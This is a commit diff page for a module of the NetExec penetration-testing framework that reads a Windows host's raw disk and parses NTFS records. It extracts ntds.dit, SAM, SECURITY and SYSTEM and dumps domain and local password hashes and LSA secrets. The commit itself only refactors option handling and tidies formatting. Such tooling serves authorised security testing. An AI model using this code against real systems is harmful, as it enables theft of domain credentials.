Skip to content

Commit fedca6b

Browse files
committed
Remove unnecessary function and formatting
1 parent 1d9b502 commit fedca6b

1 file changed

Lines changed: 35 additions & 29 deletions

File tree

nxc/modules/ntds-dump-raw.py

Lines changed: 35 additions & 29 deletions
Original file line numberDiff line numberDiff line change
@@ -83,25 +83,25 @@ def options(self, context, module_options):
8383
available_options = {
8484
"NTDS": "Windows/NTDS/ntds.dit",
8585
"LSA": "Windows/System32/config/SECURITY",
86-
"SAM": "Windows/System32/config/SAM"}
87-
selected_files_full_path = []
86+
"SAM": "Windows/System32/config/SAM"
87+
}
88+
self.files_full_location_to_extract = []
8889
if "TARGET" in module_options:
8990
selected_options = module_options["TARGET"].split(",")
9091
for option in selected_options:
9192
if option in available_options:
92-
selected_files_full_path.append(available_options[option])
93+
self.files_full_location_to_extract.append(available_options[option])
9394
else:
9495
context.log.error(f"Uknown option format : {option}")
9596
sys.exit(1)
9697
else:
97-
selected_files_full_path.append(available_options["NTDS"])
98-
selected_files_full_path.append(available_options["SAM"])
99-
self.add_files_path_to_extract(selected_files_full_path)
100-
101-
def add_files_path_to_extract(self, selected_files_full_path):
102-
"""Add the selected file paths for extraction and including SYSTEM by default"""
103-
selected_files_full_path.append("Windows/System32/config/SYSTEM")
104-
self.files_full_location_to_extract = selected_files_full_path
98+
self.files_full_location_to_extract.append(available_options["NTDS"])
99+
self.files_full_location_to_extract.append(available_options["SAM"])
100+
101+
# Add SYSTEM by default as needed for decryption
102+
self.files_full_location_to_extract.append("Windows/System32/config/SYSTEM")
103+
104+
# Prepare the files to extract
105105
self.files_to_extract = [c_filename.split("/")[-1] for c_filename in self.files_full_location_to_extract]
106106
self.number_of_file_to_extract = len(self.files_to_extract)
107107
self.extracted_files_location_local = dict.fromkeys(self.files_to_extract, "")
@@ -139,7 +139,7 @@ def main(self):
139139
first_section = self.read_from_disk(0, 1024)
140140
if len(first_section) == 0:
141141
self.logger.fail("Unable to read the Disk, try changing the --exec-method flag")
142-
if first_section[512 : 512 + 8] == b"EFI PART":
142+
if first_section[512: 512 + 8] == b"EFI PART":
143143
self.logger.display("Disk is formated using GPT")
144144
NTFS_LOCATION = self.analyze_gpt("\\\\.\\PhysicalDrive0")
145145
if NTFS_LOCATION == -1:
@@ -149,10 +149,10 @@ def main(self):
149149
max_parition_size = 0
150150
NTFS_LOCATION = self.bytes_to_int_unsigned(first_section[0x1C6:0x1CA]) * self.SECTOR_SIZE
151151
for partition_indx in range(4):
152-
curr_partition_size = self.bytes_to_int_unsigned(first_section[0x1CA + (partition_indx * 0x10) : 0x1CE + (partition_indx * 0x10)])
152+
curr_partition_size = self.bytes_to_int_unsigned(first_section[0x1CA + (partition_indx * 0x10): 0x1CE + (partition_indx * 0x10)])
153153
if curr_partition_size > max_parition_size:
154154
max_parition_size = curr_partition_size
155-
NTFS_LOCATION = self.bytes_to_int_unsigned(first_section[0x1C6 + (partition_indx * 0x10) : 0x1CA + (partition_indx * 0x10)]) * self.SECTOR_SIZE
155+
NTFS_LOCATION = self.bytes_to_int_unsigned(first_section[0x1C6 + (partition_indx * 0x10): 0x1CA + (partition_indx * 0x10)]) * self.SECTOR_SIZE
156156

157157
self.logger.display(f"NTFS Location {hex(NTFS_LOCATION)}")
158158
self.NTFS_LOCATION = NTFS_LOCATION
@@ -180,7 +180,7 @@ def dump_hashes(self):
180180
local_operations = LocalOperations(self.extracted_files_location_local["SYSTEM"])
181181
boot_key = local_operations.getBootKey()
182182
no_lm_hash = local_operations.checkNoLMHashPolicy()
183-
183+
184184
# NTDS hashes
185185
if "ntds.dit" in self.extracted_files_location_local and self.extracted_files_location_local["ntds.dit"] != "":
186186
def add_ntds_hash(ntds_hash, host_id):
@@ -233,7 +233,7 @@ def add_ntds_hash(ntds_hash, host_id):
233233
NTDS.dump()
234234
except Exception as e:
235235
self.logger.fail(e)
236-
236+
237237
NTDS.finish()
238238

239239
# SAM hashes
@@ -281,7 +281,13 @@ def add_SAM_hash(SAM_hash, host_id):
281281

282282
# LSA
283283
if "SECURITY" in self.extracted_files_location_local and self.extracted_files_location_local["SECURITY"] != "":
284-
LSA = LSASecrets(self.extracted_files_location_local["SECURITY"], boot_key, None, isRemote=False, perSecretCallback=lambda secret_type, secret: self.logger.highlight(secret))
284+
LSA = LSASecrets(
285+
self.extracted_files_location_local["SECURITY"],
286+
boot_key,
287+
remoteOps=None,
288+
isRemote=False,
289+
perSecretCallback=lambda secret_type, secret: self.logger.highlight(secret)
290+
)
285291

286292
try:
287293
self.logger.success("LSA Secrets:")
@@ -300,7 +306,7 @@ def add_SAM_hash(SAM_hash, host_id):
300306

301307
def analyze_NTFS(self, ntfs_header):
302308
"""Decode the NTFS headers and extract needed infromation from it"""
303-
ntfs_header = ntfs_header[0xB : 0xB + 25 + 48]
309+
ntfs_header = ntfs_header[0xB: 0xB + 25 + 48]
304310
header_format = "<HBH3BHBHHHIIIQQQIB3BQI"
305311

306312
data = struct.unpack(header_format, ntfs_header)
@@ -348,7 +354,7 @@ def search_for_the_files(self, curr_data):
348354
"""Analyze the current MFT records and extract the targeted files if they are present"""
349355
MFT_record_indx = 0
350356
for curr_record_indx in range(len(curr_data) // 1024):
351-
curr_sector = curr_data[curr_record_indx * 1024 : curr_record_indx * 1024 + 1024]
357+
curr_sector = curr_data[curr_record_indx * 1024: curr_record_indx * 1024 + 1024]
352358
try:
353359
curr_MFA_sector_properties = self.analyze_MFT_header(curr_sector)
354360
if curr_MFA_sector_properties is None or curr_MFA_sector_properties.filename is None:
@@ -463,9 +469,9 @@ def decode_dataRun(self, dataRun):
463469
dataRun_len_nBytes = (dataRun[curr_datarun_indx] & 0b11110000) >> 4
464470
curr_datarun_indx += 1
465471

466-
dataRun_len = dataRun[curr_datarun_indx : curr_datarun_indx + dataRun_startingCluster_nBytes]
472+
dataRun_len = dataRun[curr_datarun_indx: curr_datarun_indx + dataRun_startingCluster_nBytes]
467473
dataRun_len = int.from_bytes(dataRun_len, byteorder="little", signed=False)
468-
datarun_startingCluster = dataRun[curr_datarun_indx + dataRun_startingCluster_nBytes : curr_datarun_indx + dataRun_startingCluster_nBytes + dataRun_len_nBytes]
474+
datarun_startingCluster = dataRun[curr_datarun_indx + dataRun_startingCluster_nBytes: curr_datarun_indx + dataRun_startingCluster_nBytes + dataRun_len_nBytes]
469475

470476
datarun_cluster_loc = int.from_bytes(datarun_startingCluster, byteorder="little", signed=True) + prev_datarun_loc
471477

@@ -483,12 +489,12 @@ def parse_MFT_header(self, curr_sector):
483489
parsed_header = {}
484490

485491
while True:
486-
curr_header = self.bytes_to_int_unsigned(curr_sector[curr_index : curr_index + 4])
492+
curr_header = self.bytes_to_int_unsigned(curr_sector[curr_index: curr_index + 4])
487493
if curr_header == 0xFFFFFFFF or curr_header is None:
488494
break
489495

490-
curr_header_len = self.bytes_to_int_unsigned(curr_sector[curr_index + 4 : curr_index + 4 + 4])
491-
parsed_header[self.ATTRIBUTE_NAMES[curr_header]] = curr_sector[curr_index : curr_index + curr_header_len]
496+
curr_header_len = self.bytes_to_int_unsigned(curr_sector[curr_index + 4: curr_index + 4 + 4])
497+
parsed_header[self.ATTRIBUTE_NAMES[curr_header]] = curr_sector[curr_index: curr_index + curr_header_len]
492498
curr_index = curr_index + curr_header_len
493499

494500
return parsed_header
@@ -505,13 +511,13 @@ def analyze_MFT_header(self, curr_sector):
505511
parsed_header = self.parse_MFT_header(curr_sector[Offset_to_the_first_attribute:])
506512

507513
if "$FILE_NAME" in parsed_header:
508-
filename_lenght = self.bytes_to_int_signed(parsed_header["$FILE_NAME"][0x58 : 0x58 + 1])
509-
curr_MFA_sector.parent_record_number = self.bytes_to_int_unsigned(parsed_header["$FILE_NAME"][0x18 : 0x18 + 3] + b"\x00")
514+
filename_lenght = self.bytes_to_int_signed(parsed_header["$FILE_NAME"][0x58: 0x58 + 1])
515+
curr_MFA_sector.parent_record_number = self.bytes_to_int_unsigned(parsed_header["$FILE_NAME"][0x18: 0x18 + 3] + b"\x00")
510516

511-
curr_MFA_sector.filename = parsed_header["$FILE_NAME"][0x58 + 2 : 0x58 + 2 + (filename_lenght * 2)].decode("utf-16")
517+
curr_MFA_sector.filename = parsed_header["$FILE_NAME"][0x58 + 2: 0x58 + 2 + (filename_lenght * 2)].decode("utf-16")
512518

513519
if "$DATA" in parsed_header:
514-
dataRun_offset = self.bytes_to_int_signed(parsed_header["$DATA"][0x20 : 0x20 + 1])
520+
dataRun_offset = self.bytes_to_int_signed(parsed_header["$DATA"][0x20: 0x20 + 1])
515521

516522
dataRun = parsed_header["$DATA"][dataRun_offset:]
517523
curr_MFA_sector.dataRun, curr_MFA_sector.size = self.decode_dataRun(dataRun)
@@ -550,7 +556,7 @@ def read_partition_entries(self, disk_path, partition_entry_lba, num_partition_e
550556

551557
for i in range(num_partition_entries):
552558
entry_offset = i * partition_entry_size
553-
partition_entry = partition_table_data[entry_offset : entry_offset + partition_entry_size]
559+
partition_entry = partition_table_data[entry_offset: entry_offset + partition_entry_size]
554560
partition_entries.append(partition_entry)
555561

556562
return partition_entries

0 commit comments

Comments
 (0)